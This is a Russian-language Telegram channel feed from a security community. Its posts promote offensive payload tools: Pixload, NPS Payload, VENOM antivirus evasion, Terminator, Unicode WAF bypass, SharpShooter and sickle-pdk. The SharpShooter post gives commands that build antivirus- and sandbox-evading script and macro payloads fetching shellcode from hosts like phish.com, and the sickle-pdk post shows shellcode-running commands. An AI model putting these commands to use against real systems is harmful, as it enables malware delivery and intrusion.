Codeby
36.3K subscribers
2.09K photos
98 videos
12 files
7.86K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.academy

CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
Pixload: вредоносный скрипт в изображении

Добрый день, уважаемые форумчане и друзья.
Когда-то стали известны способы размещения вредоносного кода в изображении.
Немногим позднее появилась атака Polyglot,когда вредоносный файл одновременно является изображением и JavaScript-кодом..

Продолжение: https://codeby.net/threads/pixload-vredonosnyj-skript-v-izobrazhenii.69411/

#payload #javascript
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
NPS Payload - Скрипт для генерации полезных нагрузок

Приветствую, форумчане! В этой статье хочу представить инструмент для генерации полезных нагрузок. Представляет он из себя скрипт под названием NPS Payload.

Читать: https://codeby.net/forum/threads/nps-payload-skript-dlja-generacii-poleznyx-nagruzok.60073/

#payload
————————————————
Фриланс Кодебай — сервис поиска удаленной работы и размещения заказов
​​Обход антивируса с помощью зашифрованных Payload, используя VENOM

В настоящее время многие вредоносные программы и Payload используют методы шифрования и методы пакетирования с применением Packers, чтобы обойти антивирусное программное обеспечение, поскольку антивирусу трудно обнаружить зашифрованные и упакованные вредоносные программы и Payload.

Читать: https://codeby.net/threads/obxod-antivirusa-s-pomoschju-zashifrovannyx-payload-ispolzuja-venom.64505/

#antivirus #payload #venom
​​Terminator - генератор Payloads для Metasploit

Добрый день,Уважаемые Форумчане,Друзья и те,кто следит за пульсом ИБ. Хочу порадовать форум сегодня новинкой,которая генерирует различные backdoor. Автора этого замечательного генератора зовут Mohamed Nour. Помогать мне сегодня будут сделать обзор дистрибутивы ArchStrike и BlackArch. Простите за дерзость,но продемонстрирую вам атаку на BlackArch Linux.

Читать: https://codeby.net/threads/terminator-generator-payloads-dlja-metasploit.63477/

#payload #metasploit #framework
​​Используем особенности Юникода для обхода WAF

Unicode Compatibility - это форма эквивалентности Юникода, которая гарантирует, что между символами или последовательностями символов, которые могут иметь различный внешний вид или поведение, представлен один и тот же абстрактный символ. Например, римским цифрам соответствуют собственные символы Юникода, но они также могут быть представлены символами латинского алфавита I, V, M и так далее. При использовании совместимости, специальные символы римских цифр будут преобразованы в их эквиваленты с использованием символов латинского алфавита. Такое поведение может открыть дверь для злоупотребления некоторыми слабыми реализациями, которые выполняют совместимость с юникодом после очистки входных данных.

Читать: https://codeby.net/threads/ispolzuem-osobennosti-junikoda-dlja-obxoda-waf.72233/

#unicode #waf #payload
🦈 SharpShooter

Фреймворк для создания полезных нагрузок, предназначенный для загрузки и выполнения произвольного исходного кода на C#. Инструмент может создавать полезные нагрузки в различных форматах, включая HTA, JS, VBS и WSF. Используется DotNetToJavaScript для вызова методов из сериализованного .NET-объекта SharpShooter.

Полезные нагрузки можно получать через веб или DNS, либо через оба канала одновременно. Также возможна генерация stageless полезных нагрузок со встроенным выполнением шелл-кода.

Созданные полезные нагрузки шифруются алгоритмом RC4 со случайным ключом для базового обхода антивирусов. Фреймворк также включает возможности обнаружения песочниц и привязки к окружению для повышения скрытности.

Поддерживает возможность упаковывать полезную нагрузку в HTML-файл с использованием техники Demiguise HTML smuggling.

⚡️ Установка
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt


🦇 Использование
1️⃣Создание JavaScript-полезной нагрузки без этапов выполнения, ориентированной на версию 4 платформы .NET. В данном примере создаётся полезная нагрузка с именем foo.js в выходной директории. Шелл-код считывается из файла ./raw.txt. Полезная нагрузка пытается обеспечить обход песочницы путём привязки выполнения к домену CONTOSO и проверки на наличие известных артефактов виртуальных машин.
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3


2️⃣Создаётся VBS-полезная нагрузка, которая осуществляет доставку как через Web, так и через DNS. Полезная нагрузка попытается загрузить сжатый C#-файл, выполняющий шелл-код в файле csharpsc.txt.
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4


3️⃣Далее показано, как создать промежуточную полезную нагрузку JS, которая выполняет веб-доставку и получает полезную нагрузку с http://www.phish.com/implant.payload. Сгенерированная полезная нагрузка попытается обойти песочницу и скомпилировать полученную полезную нагрузку.
SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo --rawscfile ./x86payload.bin --smuggle --template mcafee --com outlook --awlurl http://192.168.2.8:8080/foo.xsl


4️⃣Создаётся макрос VBA, который использует COM-интерфейс XMLDOM для получения и выполнения размещённой таблицы стилей.
SharpShooter.py --stageless --dotnetver 2 --payload macro --output foo --rawscfile ./x86payload.bin --com xslremote --awlurl http://192.168.2.8:8080/foo.xsl


P.S. Используйте этот инструмент только в образовательных целях!

#tools #payload #SharpShooter

➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍7🔥5👎1
🧠sickle-pdk

Набор инструментов для создания полезной нагрузки. В инструменте реализован модульный подход, позволяющий добавлять новые функции с минимальными затратами времени на изучение структуры инструмента.


Возможности
1️⃣Генерация шелл-кода - поддерживает генерацию шелл-кода с помощью Keystone Engine.

2️⃣Sickle включает модуль diffing, изначально разработанный для анализа заглушек шелл-кода. Оригинальный режим asm выполняет линейное сравнение различий дизассемблированного кода как на уровне ассемблера, так и отдельно на уровне опкодов. Кроме того, Sickle предлагает различные режимы сравнения, что делает его полезным не только при разработке шелл-кода

3️⃣Выполнение шелл-кода. Одна из распространенных задач, которую часто приходится выполнять, — это тестирование шелл-кода. Этот процесс обычно состоит из следующих этапов:
▶️Компиляция кода на языке ассемблера.
▶️Извлечение шелл-кода и форматирование его в соответствии с выбранной оболочкой.
▶️Компиляция и запуск оболочки.

Sickle упрощает процесс, автоматически оборачивая шелл-код для быстрого тестирования, а модуль run в настоящее время поддерживает как Windows, так и Unix

4️⃣Дизасемблирование - Sickle также может преобразовывать двоичный файл в извлеченные опкоды, а затем преобразовывать их в машинные инструкции (ассемблер).

5️⃣Извлечение шелл-кода - основная функция Sickle, поскольку опкоды интерпретируются по-разному в зависимости от используемой оболочки. Например, JavaScript не хранит и не интерпретирует шелл-код так же, как программы на языке C.

6️⃣Выявление недопустимых символов. Хотя в 64-битных эксплойтах это встречается реже, могут быть случаи, когда эксплойт ограничивает использование определённых символов. Именно здесь модуль pinpoint особенно полезен, так как он напрямую определяет и выделяет инструкции ассемблера, ответственные за обнаруженные недопустимые символы.

⛓️‍💥Использование
➡️Сравнение
sickle-pdk -m diff -r calc.exe BINFILE=calc2.exe MODE=htxdump


➡️Выполнение шелл-кода
sickle-pdk -m run -r shellcode.bin


➡️Дизасемблирование
sickle-pdk -r generic_sc -m disassemble


➡️Извлечение шелл-кода
sickle-pdk -r generic_sc -f rust 


#tools #payload #assemler

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Please open Telegram to view this post
VIEW IN TELEGRAM
5👍4🔥4